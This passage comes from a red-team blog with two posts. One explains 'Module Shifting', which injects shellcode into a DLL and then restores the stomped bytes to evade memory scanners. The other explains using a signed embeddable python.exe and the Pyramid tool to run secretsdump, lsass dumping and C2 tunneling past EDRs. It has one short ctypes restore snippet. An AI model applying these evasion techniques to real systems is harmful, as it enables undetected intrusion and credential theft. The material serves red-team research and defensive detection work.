<p>However, we can improve a bit this outcome by introducing Module Stomping injection technique.</p>

<h4 id="module-stomping">Module Stomping</h4>

<p>Module stomping provides the same Module Overloading benefit of avoiding dynamic memory creation through the loading of a hosting dll to be used as “disposable space” onto which overwrite malicious content.
The main difference is that Module Stomping is way more simpler than Module Overloading because its aim is writing and executing shellcode, not a PE. So we don’t need the Windows Loader steps that both Memory Module and Module Overloading adopted, with Module Stomping we just need to write and directly executing shellcode.</p>

<p>Some Module Stomping implementations have been made publicly available by <a href="https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/">F-Secure</a> and <a href="https://github.com/boku7/Ninja_UUID_Runner/">Bobby Cooke</a></p>

<p>At a high level, Module Stomping steps look like this:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/modulestomping.png" alt="image-center" title="Module Stomping injection technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Stomping injection technique</em></td>
    </tr>
  </tbody>
</table>

<p>After injecting via Module Stomping using wmp.dll as hosting dll and writing the malicious shellcode over the .rsrc section we obtain the IoCs depicted in the following image.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/modulestompingIoCs.png" alt="image-center" title="Module Stomping IoCs" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Stomping IoCs</em></td>
    </tr>
  </tbody>
</table>

<p>We gradually reduced the generated IoCs but “Modified Code” is still haunting us because it’s a trademark for both Module Stomping and Module Overloading technique.
The “inconsistent +x between disk and memory” is obtained because of the shellcode written over the .rsrc section and subsequent +RX permission set.
Moneta is complaining about the fact that .rsrc section originally does not have executable permission.</p>

<p>Both of these IoCs can be finally avoided with some improvements that are implemented in a technique dubbed “Module Shifting”.</p>

<h3 id="module-shifting">Module Shifting</h3>

<p>Till now we observed how some injections behave in memory and gained a bit of knowledge of how and why memory scanners identifiy suspicious memory anomalies.</p>

<p>We can use this knowledge to our advantage by asking ourself few what-if questions:</p>

<ol>
  <li>what if the writing of the shellcode is shifted to a section of a dll that is normally self-modifying the exact section?</li>
  <li>what if we inject using a self-modifying dll as host with enough space to write our shellcode and we apply some padding to look exactly as the self-modifying behaviour?</li>
  <li>what if we use a shellcode payload that is functionally independent from further stages and we overwrite the executed shellcode with the dll’s original bytes?</li>
</ol>

<p>After experimenting and answering all these questions we came up with the <a href="https://github.com/naksyn/ModuleShifting">Module Shifting technique</a> that aims at improving Module Stomping and Module Overloading by providing the following advantages:</p>

<ol>
  <li>Avoids “Modified code” between virtual memory and on disk dll leaving near to zero suspicious memory artifacts, getting no indicators on Moneta and PE-Sieve</li>
  <li>better blending into common False Positives by choosing the target section and using padding</li>
  <li>Can be used with PE and shellcode payloads</li>
  <li>Implemented in Python ctypes – full-in-memory execution available</li>
</ol>

<p>At a high level, Module Shifting steps look like this:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/moduleshifting.png" alt="image-center" title="Module Shifting Injection technique" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Module Shifting Injection technique</em></td>
    </tr>
  </tbody>
</table>

<p>The restore operation is quite simple and is done after executing the initial shellcode.</p>

<figure class="highlight"><pre><code class="language-python" data-lang="python"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="code"><pre><span class="c1"># Restore operation     
</span>        <span class="n">VirtualProtect</span><span class="p">(</span>
<span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="n">cast</span><span class="p">(</span><span class="n">tgtaddr</span><span class="p">,</span><span class="n">c_void_p</span><span class="p">),</span> 
<span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="n">mod_bytes_size</span><span class="p">,</span>
<span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="n">PAGE_READWRITE</span><span class="p">,</span> <span class="err"> </span>
<span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="n">byref</span><span class="p">(</span><span class="n">oldProtect</span><span class="p">))</span>
<span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="err"> </span> <span class="n">memmove</span><span class="p">(</span><span class="n">cast</span><span class="p">(</span><span class="n">tgtaddress</span><span class="p">,</span><span class="n">c_void_p</span><span class="p">),</span> <span class="bp">self</span><span class="p">.</span><span class="n">targetsection_backupbuffer</span><span class="p">,</span> <span class="n">mod_bytes_size</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>After setting the shellcode memory area permissions to RW the content of <strong>targetsection_backupbuffer</strong>, containing a copy of the original dll for the same exact amount of shellcode bytes and position, gets written over the shellcode.
This effectively restores the stomped bytes to the original ones, leaving no traces of the written shellcode anymore.
In this way, Moneta and PE-Sieve will do a byte-by-byte comparison as usual and will find no mismatch between the hosting dll on-disk bytes and in-memory ones.</p>

<p>There won’t be also any inconsistent executable permissions because we set the permissions back to the section’s original values.</p>

<p>Following is a demonstration of a self-process injection with Module Shifting technique using a Cobalt Strike Beacon shellcode generated with AceLdr.
<strong>After executing Moneta and PE-Sieve we get no IoCs detected</strong> because there are no artifacts left by Module Shifting injection technique (payload is not our focus), that was our initial aim.</p>

<video width="100%" preload="auto" height="auto" max-width="100px" muted="" controls="">
    <source src="/videos/moduleshifting.mp4" type="video/mp4" />
</video>

<p>Even though Moneta and PE-Sieve did not generate IoCs, a runtime inspection scanner could identify some anomalies.
In fact, overwriting a 307,2 kB payload over the .text section of mscorlib.ni.dll can be a malicious indicator because the common behaviour for this dll is to overwrite 45 kB.</p>

<p>However, this anomaly could not be spotted by scanners without runtime inspection capabilities, because Module Shifting does not leave artifacts floating around after having restored the stomped bytes.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/detopp.png" alt="image-center" title="Detection Opportunities" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Detection Opportunities</em></td>
    </tr>
  </tbody>
</table>

<h3 id="outro">Outro</h3>

<p>Concluding this exploration, we dove deep into the intricacies of injection techniques, honing in on Module Stomping and Module Overloading as part of the PE injection arsenal.</p>

<p>The objective was clear: to improve these techniques, aiming for more operational stealthiness.
We delved into the journey of improving memory injection techniques
While traditional approaches like Module Stomping faced challenges with “Modified Code” IoC due to the stomped code’s residence in the hosting dll, we’ve delineated a strategy to finally circumvent these obstacles. 
The newly introduced Module Shifting technique encapsulates these enhancements, offering a more nuanced way to to operate with a greater stealthiness.</p>

<p>The key takeaways for this blog post are:</p>

<ol>
  <li>Injection Techniques have several moving parts</li>
  <li>Python can be used as a loader with Pyramid and ctypes to dynamically call windows APIs</li>
  <li>Memory IoCs can be greatly reduced with a proper injection strategy</li>
  <li>Memory scanners can be used by attackers to find False Positives candidates to blend in</li>
  <li>Functionally-independent Shellcode payloads once injected and executed can be overwritten with original dll content</li>
  <li>ModuleShifting improvements can be applied also to other injection techniques</li>
</ol>

<p>The future of injection techniques is always evolving, and the landscape will continually shift towards greater sophistication and precision.</p>]]></content><author><name>Naksyn</name></author><category term="EDR evasion" /><category term="evasion" /><category term="redteam" /><category term="python" /><category term="injection" /><category term="cobalt strike" /><category term="module stomping" /><category term="module overloading" /><category term="pyramid" /><summary type="html"><![CDATA[A journey in improving Module Stomping and Module Overloading injection technique, ending up evading Moneta and PE-Sieve]]></summary></entry><entry><title type="html">Living-Off-the-Blindspot - Operating into EDRs’ blindspot</title><link href="https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html" rel="alternate" type="text/html" title="Living-Off-the-Blindspot - Operating into EDRs’ blindspot" /><published>2022-09-01T00:00:00-04:00</published><updated>2022-01-09T16:10:20-05:00</updated><id>https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot</id><content type="html" xml:base="https://www.naksyn.com/edr%20evasion/2022/09/01/operating-into-EDRs-blindspot.html"><![CDATA[<p><img src="/images/edr_vs_python.png" alt="image-center" title="How evasion really looks like" class="align-center" /></p>

<div id="entry-table-of-contents" class="toc-wrapper">
  <h2 id="toc-toggle" class="no_toc">
  Table of Contents <i class="toc-toggle-icon fas fa-chevron-down"></i>
</h2>
<ol id="markdown-toc">
  <li><a href="#tldr" id="markdown-toc-tldr">TL;DR</a></li>
  <li><a href="#intro" id="markdown-toc-intro">Intro</a></li>
  <li><a href="#edrs-defenses" id="markdown-toc-edrs-defenses">EDRs Defenses</a>    <ol>
      <li><a href="#kernel-callbacks-and-usermode-hooking" id="markdown-toc-kernel-callbacks-and-usermode-hooking">Kernel Callbacks and Usermode Hooking</a></li>
      <li><a href="#memory-scanning" id="markdown-toc-memory-scanning">Memory Scanning</a></li>
      <li><a href="#ml-based-detections" id="markdown-toc-ml-based-detections">ML based detections</a></li>
      <li><a href="#iocs-and-ioas" id="markdown-toc-iocs-and-ioas">IoCs and IoAs</a></li>
    </ol>
  </li>
  <li><a href="#bypass-strategy" id="markdown-toc-bypass-strategy">Bypass Strategy</a>    <ol>
      <li><a href="#main-categories-of-edr-evasion-operations" id="markdown-toc-main-categories-of-edr-evasion-operations">Main Categories of EDR Evasion operations</a></li>
      <li><a href="#operational-constraints" id="markdown-toc-operational-constraints">Operational constraints</a></li>
      <li><a href="#choosing-a-language" id="markdown-toc-choosing-a-language">Choosing a language</a></li>
    </ol>
  </li>
  <li><a href="#leveraging-python" id="markdown-toc-leveraging-python">Leveraging Python</a>    <ol>
      <li><a href="#execution-method" id="markdown-toc-execution-method">Execution Method</a></li>
      <li><a href="#dynamic-in-memory-import" id="markdown-toc-dynamic-in-memory-import">Dynamic in-memory import</a></li>
      <li><a href="#beacon-object-file-execution-via-shellcode" id="markdown-toc-beacon-object-file-execution-via-shellcode">Beacon Object File execution via shellcode</a></li>
      <li><a href="#in-process-c2-agent-injection" id="markdown-toc-in-process-c2-agent-injection">In-process C2 agent injection</a></li>
    </ol>
  </li>
  <li><a href="#conclusions" id="markdown-toc-conclusions">Conclusions</a></li>
  <li><a href="#how-to-defend-from-this" id="markdown-toc-how-to-defend-from-this">How to defend from this</a></li>
</ol>

</div>

<p>The topic has been presented at <a href="https://adversaryvillage.org/adversary-events/DEFCON-30/">DEFCON30 - Adversary village</a> (deck is available <a href="https://github.com/naksyn/talks/tree/main/DEFCON30">here</a>)</p>

<h3 id="tldr">TL;DR</h3>

<p>Python provides some key properties that effectively creates a blindspot for EDR detection, namely:</p>

<ol>
  <li>Python’s wide usage implies that a varied baseline telemetry exists for Python interpreter that is natively running APIs depending on the Python code being run. This can increase the difficulty for EDRs’ vendor to spot anomalies coming from python.exe or pythonw.exe.</li>
  <li>Python lacks transparency (ref. <a href="https://peps.python.org/pep-0578/">PEP-578</a>) for dynamic code executed from stock python.exe and pythonw.exe binaries.</li>
  <li>Python Foundation officially provides a “Windows embeddable package” that can be used to run Python with a minimal environment without installation. The package comes with signed binaries.</li>
</ol>

<p>An attacker could leverage the Python official <a href="https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip">Windows Embeddable zip package</a> dropping it on disk and using the signed binary python.exe (or pythonw.exe) to execute a wide range of post exploitation tasks.</p>

<p>Having this in mind, a tool named <a href="https://github.com/naksyn/Pyramid">Pyramid</a> has been developed to demonstrate that one can bring useful capabilities into python.exe and can operate by successfully evading EDRs detection.
Pyramid can execute the following techniques straight from python.exe or pythonw.exe:</p>
<ul>
  <li>dynamically importing and executing Python-BloodHound and secretsdump.</li>
  <li>executing BOF (dumping lsass with nanodump).</li>
  <li>creating SSH local port forward to tunnel a C2 Agent.</li>
</ul>

<p>The tool has been successfully tested against several EDRs, demonstrating that a blindspot is indeed present and it is possible to execute a range of capabilities from it.
This technique has been dubbed <strong>Living-off-The-Blindspot</strong>.</p>

<h3 id="intro">Intro</h3>
<p>EDRs are commonly encountered by red teamers during engagements and it is vital to know some concepts on how to operate under their scrutiny without being detected.</p>

<p>In an effort to find a way around several EDRs, the bypass problem has been analyzed looking in a more holistic way at the current defenses put in place by EDRs in order to find a novel strategy that could enable operating in blind spots, rather than bypassing a single defense mechanism.</p>

<h3 id="edrs-defenses">EDRs Defenses</h3>
<p>EDRs deploy several defenses in order to detect and respond to threats. The common requirement for all the defenses is visibility, since you can’t protect what you can’t see.
Visibility can be understood as the EDR’s capability to properly process information aimed at gaining context for a specific status/action/language/technique on a system or network.
Information can come from OS sources (such as AMSI or ETW) or via proprietary techniques.</p>

<p>In the following paragraphs will be provided some key concepts for every major Defense that must be took into consideration while thinking about a bypass strategy.
This post is not meant to be an extensive explanation of each defensive measure since there are much better resources already available online (check here).
Bear in mind that Defenses do not usually work in silos, information are shared among them in order to contribute in the detection of a malicious activity.</p>

<h4 id="kernel-callbacks-and-usermode-hooking">Kernel Callbacks and Usermode Hooking</h4>

<p>Two common ways of increasing visibility for EDRs are Kernel Callbacks and Usermode Hooking.</p>

<p>Kernel Callbacks are commonly used to get information on processes and loaded images and to inject EDR’s dll into newly created processes (see example in the image below).
The <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine">PsSetCreateProcessNotifyRoutine</a> routine registers a Kernel Callback such that when a specific action occurs (i.e. process creation) the routine will send a pre or post-action notification to the Driver, that will then execute its callback. In the example below the Kernel driver will instructs the EDR process to inject the EDR’s dll into the newly created process, setting the groundwork for usermode hooking.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/kernel_callback.png" alt="image-center" title="Example of kernel callback trigger" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Kernel Callback example</em></td>
    </tr>
  </tbody>
</table>

<p>The EDR’s dll is then used mainly to perform Usermode Hooking patching ntdll.dll and inspecting specific Windows API calls made by processes to take some action if the call deemed as malicious.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/usermode_hooking.png" alt="image-center" title="Example of Usermode Hooking" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Usermode Hooking example</em></td>
    </tr>
  </tbody>
</table>

<p>Usermode hooking has at least two big limitations:</p>
<ol>
  <li>EDRs do not hook every Windows API call for performance issues, instead they rely on hooking in the APIs that are mostly abused by malware.</li>
  <li>Hooking is also done in usermode, so every usermode program can theoretically undo the hooking.</li>
</ol>

<h4 id="memory-scanning">Memory Scanning</h4>

<p>Memory scanning techniques look for pattern in the code and data of processes. From an EDR point of view they are resource intensive, so one of the most common approach is to do timely or triggered scans based on events/detections/analyst actions.</p>

<p>From an attacker perspective, memory scans are dangerous because even a fileless payload once is executing its routines has to be in cleartext in memory. Recently, the offensive security community came up with techniques (such as <a href="https://github.com/mgeeky/ShellcodeFluctuation">ShellcodeFluctuation</a> and <a href="https://www.cobaltstrike.com/blog/sleep-mask-update-in-cobalt-strike-4-5/">Sleep mask</a> for Cobalt STrike) to mitigate the risk of detection in memory, that basically obfuscate the code in memory after a payload is “sleeping” - i.e. not executing tasks and waiting to fetch command from C2 after a certain time.</p>

<p>However, the risk is still relevant while the payload is executing tasks and if a memory scan is triggered by malicious operations done by the payload, this may very well lead to a memory dump or a pattern matching between the cleartext version of the payload code and a set of known-bad signatures.</p>

<h4 id="ml-based-detections">ML based detections</h4>

<p>Machine Learning is an entire discipline and I don’t dare to cover it extensively since I am no expert at all and there are many other better resources elsewhere.
However, we can focus on some key-concepts that are employed in ML detections that can be very useful in defining a bypass strategy.
Starting with the very basics, we can say that Machine Learning can detect variant malware files that can evade signature-based detection.</p>

<p>Malware peculiar characteristics are translated into “features” and used for Machine Learning models training.
Features can be static (idantifiable without executing samples) or dynamic (extracted at runtime).
Basically, to detect malware using Machine Learning, one can collect large amount of malware and goodware samples, extract the features, train the ML system to recognize malware, then test the approach with real samples.</p>

<p>The features play an important role during the process because they are related to sample properties.
Some common features to determine if a file is good or bad are if the file is digitally signed or if it has been seen on more than 100 network workstations.
On the other hand, features used to determine if a file is bad could be the presence of malformed or encrypted data and a suspicious series of API calls made by the binary (dynamic feature).</p>

<p>The key concept here is that <strong>features have a “weight” into the decision process of a ML model</strong> (assigning weights to features is one of the ML training purposes).
In layman terms, this means that features with a higher weight might bend the ML model decision toward malware or goodware more than other lower weight features.
Security vendors do not publish weights nor the features used by their ML models, but as attackers we can think about at least one feature that can help evading detections: <strong>Digital Signature</strong>.
It is in fact true that malware developers and operators <a href="https://duo.com/decipher/attackers-are-signing-malware-with-valid-certificates">often try to sign</a> their malware to evade security solutions because this property is often used as a goodware feature by ML models and probably with a pretty good weight.</p>

<p>Another dynamic feature that can be abused by properly choosing the binary under which to operate is the API call sequence. This would work well for malware samples but</p>

<p class="notice--warning"><strong>what about malicious code that gets executed in-memory by an interpreter?</strong></p>

<p>In that case, the API call sequence made by the interpreter binary can be virtually <strong>everything</strong> because it depends on the code run by the intrerpreter. How are security vendors handling that?
I don’t have exact answers to these questions but we can test EDRs behaviour and draw some conclusions.</p>

<h4 id="iocs-and-ioas">IoCs and IoAs</h4>

<p>One definition of IoC is “an object or activity that, observed on a network or on a device, indicates a high probability of unauthorized access to the system”, in other words, IoCs are signatures of known-bad properties or actions performed by malware.
IoCs is useful for forensics intelligence after an attack has occurred but can also provide false positives and their effectiveness is limited to techniques and malware that is currently known by defenders.</p>

<p>On the other hand, Indicator of Attack (IoAs) can be defined as an indicator stating that an attack is ongoing. The indicator resulted from the correlation of deemed malicious actions made by an attacker and and the systems/binaries involved.
IoAs cannot be as useful as IoC for forensics purposes but can be much more useful in identifying an ongoing attack.</p>

<h3 id="bypass-strategy">Bypass Strategy</h3>

<p>Knowing some, although very basic, key concepts on common Defenses put in place by EDRs, can help shaping a bypass strategy.
Abstracting the technical details and digesting the information keeping an offensive mindset, we could summarize the previously listed Defenses in the following statements:</p>

<ol>
  <li>Usermode Hooking is applied only to certain APIs and can be circumvented from usermode.</li>
  <li>Kernel Callbacks cannot be circumvented from usermode but are mainly used to provide visibility on newly created process, loaded images and to trigger EDR’s DLL injection into newly created processes.</li>
  <li>Executing C2 payloads will increase the risk for detection by memory scans and may trigger IoCs.</li>
  <li>ML-based detections can assign a bad score to unknown and unsigned binaries, and a better score to signed and widely used binaries.</li>
  <li>IoAs can detect a malicious action by analyzing anomalies of the steps taken in executing that action.</li>
</ol>

<p>Each of the statements is an approximation and does not fully represent the characteristics of a single Defense, but still provide useful information on key properties that can be exploited for a bypass.
I hate analogies when it comes to IT topics, but the statements can be seen as ski-gates for a ski track (bypass) that does not exist yet. We just have to draw one possible track keeping the gates as boundaries.</p>

<h4 id="main-categories-of-edr-evasion-operations">Main Categories of EDR Evasion operations</h4>

<p>When it comes to evading an EDR, there are four main categories of operations:</p>

<ol>
  <li><strong>Avoiding the EDR</strong> - this can be accomplished by operating from VPN, proxying traffic, or compromising only targets not equipped with EDRs.</li>
  <li><strong>Blending into the environment</strong> - Executing operations abusing tools and actions commonly observed in the target network (e.g. administrative RDP sessions, usage of legit Administrative tools, Teams <a href="https://github.com/Flangvik/TeamFiltration, outgoing SSH traffic, internal WinRM sessions etc.">abuse</a></li>
  <li><strong>EDR tampering</strong> - this category involves disabling or limiting EDR’s features or visibility in order to perform tasks without triggering an EDR response or without sending alerts to the central repository. For more details please check this awesome <a href="https://www.infosec.tirol/how-to-tamper-the-edr/">blogpost</a>: “How To Tamper the EDR” by my friend Daniel Feichter <a href="https://mobile.twitter.com/virtualallocex">@VirtualallocEx</a></li>
  <li><strong>Operating in blind spots</strong> - EDR have finite resources and finite visibility, so blind spots are always present. Operating leveraging blindspots is powerful since it brings the less amount of risk of being detected.</li>
</ol>

<p>One can translate relate the categories in a corresponding risk for the relevant type of operation. I depicted the risk brought by the type of operation in a Pyramid of Pain (Attacker’s Version), where the layer’s of the Pyramid are ordered by the amount of risk introduced by the Operation type (bottom-up).</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/Pyramid_of_Pain_attacker_version.png" alt="image-center" title="Mapping risk levels to EDR Evasion category" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Attacker’s Pyramid of Pain - Mapping risk levels to EDR Evasion category</em></td>
    </tr>
  </tbody>
</table>

<p>It’s usually not always viable avoiding EDRs for the whole operation, especially for multi-month ones.
Ideally an attacker would want to operate in the bottom layer of the Pyramid in order to minimize risk of being detected by EDRs, however, this type of operation must be backed techniques and capabilities that usually require some amount of research to identify and exploit blindspots.
As attackers, we decided to follow this route and the following paragraphs will outline the strategy employed.</p>

<h4 id="operational-constraints">Operational constraints</h4>

<p>We should define now some contraints and limitations under which we would want to operate. EDR avoidance actions category are basically ruled out, because we’ll want to focus on finding and exploiting EDRs’ blind spot and also because avoiding EDRs at every stage of an operation is not always feasible.
For that reason we’ll want to:</p>
<ol>
  <li><strong>operate directly on an EDR equipped box</strong> without proxying traffic or avoiding to engage with EDRs.</li>
  <li><strong>be able to operate mainly agentless</strong> in order to keep memory indicators low and perform common post-exploitation tasks without needing a C2 agent running.</li>
  <li><strong>avoid remote process injection and dropping malicious artifacts on disk</strong>  for the very same reason of keeping memory indicators low,  .</li>
  <li><strong>keep C2 agent execution capability as a last-resort</strong> since in some cases we’ll have to accept the tradeoff risk to get extended C2 features available.</li>
</ol>

<p>To operate in a similar scenario we would need some capabilites in our tooling, such like:</p>

<ol>
  <li>Dynamic module loading</li>
  <li>Compatibility with community-driven tools</li>
  <li>Traffic tunneling without spawning new processes</li>
</ol>

<h4 id="choosing-a-language">Choosing a language</h4>

<p>Operations require capabilities that in turn are coded in a programming language. So it makes sense to start first by choosing a programming language that could be functional in finding blind spots <strong>AND</strong> accelerate capabilities development.</p>

<p>The programming language that would better fit the scenario in which we’ll be operating should have the following requirements:</p>
<ol>
  <li>the programming language of choiche should be a <strong>non-native language</strong> (to avoid using custom compiled malicious artifacts) and provide a <strong>signed interpreter</strong> to execute code.</li>
  <li>it must be possible to <strong>execute code without directly install tools</strong> on the target machine.</li>
  <li>existing public <strong>tooling in that same language could be imported</strong>.</li>
  <li>additional <strong>capabilities could be developed without much hassle</strong>.</li>
  <li>Should <strong>provide the least amount possible of optics to EDRs</strong>.</li>
</ol>

<p>The candidates languages were F#, Javascript, C# and Python. However, after having exluded languages with integrated optics into OS (such as <a href="https://docs.microsoft.com/it-it/windows/win32/amsi/antimalware-scan-interface-portal">AMSI</a> for C# and F#) or with few offensive public tooling available, Python seemed the most promising candidate.
As a matter of fact, Python can satisfy the above requirements since:</p>
<ol>
  <li>Python is an interpreted language and cames officially with a signed interpreter. It’s not tightly integrated with OS optics since Python uses native systems API directly and existing monitoring tools either suffer from limited context or auditing bypass. <a href="https://peps.python.org/pep-0578/">PEP-578</a> wanted to solve this issue, since there is <strong>no native way of monitoring what’s happening during a Python script execution</strong>. However, as we’ll see later, the issue is not solved yet.</li>
  <li>Python.org ditributes <a href="https://www.python.org/downloads/release/python-3104/">Windows Embeddable zip packages</a> containing a minimal Python enviromnet that does not require installation.</li>
  <li>There is a huge amount of public tooling available written in Python that can be imported and used</li>
  <li>Python can provide access to Windows APIs via <a href="https://docs.python.org/3/library/ctypes.html">ctypes</a> and shellcode can be injected into the Python process itself using Python, allowing theoretically the execution of any managed code or the development of any capability in Python (C# assemblies could also be ran using <a href="https://github.com/TheWover/donut">Donut</a>).</li>
</ol>

<p>The above-listed properties indicates what could be a candidate blindspot within which we can build capabilities and test its effectiveness against EDRs. The fact that currently there isn’t an out-of-the-box way to inspect dynamic Python code execution opens up a very interesting avenue for attackers.</p>

<p>Furthermore, <strong>Python is widely used and its (signed) interpreter is executing directly windows API calls depending on the Python code ran</strong>. This imply an enormous variety of telemetry and API calls ran from the very same binary (python.exe or pythonw.exe) that brings other precious extra points when it comes to operating undetected with EDRs.
In fact, it will likely be difficult for EDR vendors to spot anomalies (and build detections) coming from python.exe when its baseline telemetry is so varied.</p>

<p>All things considered, Python provides some unique opportunities that can be exploited to operate in EDRs’ blindspot.</p>

<h3 id="leveraging-python">Leveraging Python</h3>

<p>To help operate within the blindspots provided by Python I wrote a tool named Pyramid (available on my <a href="https://github.com/naksyn/Pyramid">github</a>).
The tool’s aim is to leverage Python to operate in the blindspots identified previously by currently using four main techniques:</p>

<ol>
  <li>Execution Method - Dropping and running python.exe from “Windows Embeddable Zip Package”.</li>
  <li>Dynamic in-memory loading and execution of Python code.</li>
  <li>Beacon Object Files execution via shellcode.</li>
  <li>In-process C2 Agent injection.</li>
</ol>

<h4 id="execution-method">Execution Method</h4>

<p>The execution method for our techniques should be aimed at creating the less amount possible of suspicious indicators that could trigger an anomaly or a detection.
Thinking about the Defenses, one could trick ML-detections by using the signed Python interpreter and IoAs by avoiding to create uncommon process tree patterns.</p>

<p>So the most simple way to achieve this would be dropping the Windows Embeddable zip package on a user folder or share and launching directly python.exe (or pythonw.exe) without spawning it from C2 agents or unknown binaries.
This acton would mimick a common execution for Python and wouldn’t likely be flagged as malicious by EDRs.</p>

<h4 id="dynamic-in-memory-import">Dynamic in-memory import</h4>

<p>The technique of importing dynamically in-memory Python modules has been around for quite some time and some great previous work has been done by <a href="">xorrior</a> with <a href="https://github.com/EmpireProject/EmPyre">Empyre</a>, <a href="https://twitter.com/scythe_io">scythe_io</a> with <a href="https://arxiv.org/abs/2103.15202">in-memory Embedding of CPython</a>, <a href="https://twitter.com/ajpc500">ajpc500</a> with <a href="https://github.com/MythicAgents/Medusa">Medusa</a>.</p>

<p>The core for Dynamic import is the <a href="https://peps.python.org/pep-0302/">PEP-302 “New Import Hooks”</a> that is describing how to modify the logic in which python modules are located and how they are loaded. The normal way of Python to import module is to use a path on disk where the module is located.
However, we want to import modules in memory, not from disk.</p>

<p>Import hooks allow you to modify the logic in which Python modules are located and how they are loaded, this involves defining a custom “Finder” class and either adding finder objects to <a href="https://docs.python.org/3/library/sys.html">sys.meta_path</a>
sys.meta_path holds entries that implement Python’s default import semantics (you can view an example <a href="https://docs.python.org/2/tutorial/modules.html">here</a>)</p>

<p>So basically to use PEP-302 and be able to import modules in-memory one should:</p>

<ol>
  <li>Use a custom Finder class. Pyramid finder class in based on <a href="https://github.com/EmpireProject/EmPyre">Empyre</a> one.</li>
  <li>In-memory download a Python package as a zip.</li>
  <li>Add the zip file finder object to sys.meta_path.</li>
  <li>Import the zip file in memory.</li>
</ol>

<p>There are some limitations though, firstly PEP-302 does not support importing python extensions (*.pyd files) and secondly if you are in-memory importing a package with lot of dependencies this will bring conflicts between them (dependencies nightmare) and will be needed to sort them out.</p>

<p>The first problem is the most complex one, since to in-memory import *.pyd files the CPython interpreter needs to be re-engineered and recompiled (that’s what scythe_io <a href="https://arxiv.org/abs/2103.15202">did</a>), hence losing the precious digital signature.
We can avoid losing the Python interpreter digital signature by dropping on disk the *.pyd files needed for the Python dependency that we want to import in-memory.</p>

<p>In fact, looking at the normal Python behavior when it comes to importing *.pyd files (that are essentially dlls), we can see that under the hood they are loaded using the windows API <a href="https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa">LoadLibraryEx</a> and taking the path on disk.
We can accept a tradeoff and import pyd files by dropping them on disk and continue importing in-memory all the other modules that do not require *.pyd files.
This will allow us to maintain the interpreter digital signature and we’ll use the normal Python behaviour in loading the extensions.</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/loading_pyd.png" alt="image-center" title="Normal Python behaviour for loading pyd files" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Normal Python behaviour for loading pyd files</em></td>
    </tr>
  </tbody>
</table>

<p>The second problem has been solved by manually addressing every dependency issue while importing the packages python-bloodhound, paramiko, impacket secretsdump and providing the fixed dependencies in Pyramid to use with a freezed version of the target packages.
The technique execution flow is depicted in the following scheme:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center"><img src="/images/exec_flow_1.png" alt="image-center" title="Dynamically importing and executing BloodHound-Python/secretsdump" class="align-center" /></th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center"><em>Dynamically importing and executing BloodHound-Python/secretsdump with Pyramid</em></td>
    </tr>
  </tbody>
</table>

<p>Here’s a demonstration of using Pyramid to run  Python-BloodHound from Python.exe after having imported in-memory its dependencies. Only the Cryptodome wheel has been dropped on disk because it contains pyd files used by BloodHound.</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/1fpoMqD9DXL4wY4RfvCqWw-MUGF80xbMR/preview" allowfullscreen=""></iframe>
</div>

<p>In the following video Pyramid has also been used to dynamically in-memory import impacket-secretsdump.</p>

<div class="gdrive-wrapper">
  <iframe src="https://drive.google.com/file/d/18yY5S1xuTaG1sWqKIQmTElnD6OvalGMn/preview" allowfullscreen=""></iframe>
</div>

<p>.</p>

<h4 id="beacon-object-file-execution-via-shellcode">Beacon Object File execution via shellcode</h4>

<p>This technique has already been introduced in <a href="https://www.naksyn.com/injection/2022/02/16/running-cobalt-strike-bofs-from-python.html">my previous blogpost</a>, however, the TL;DR is that we can use <a href="https://github.com/trustedsec/COFFLoader">COFFloader</a> and <a href="https://github.com/FalconForceTeam/BOF2shellcode">BOF2Shellcode</a> to execute Beacon Object Files via shellcode.
The shellcode can then be injected directly into python.exe using Python and <a href="https://docs.python.org/3/library/ctypes.html">ctypes</a>.</p>

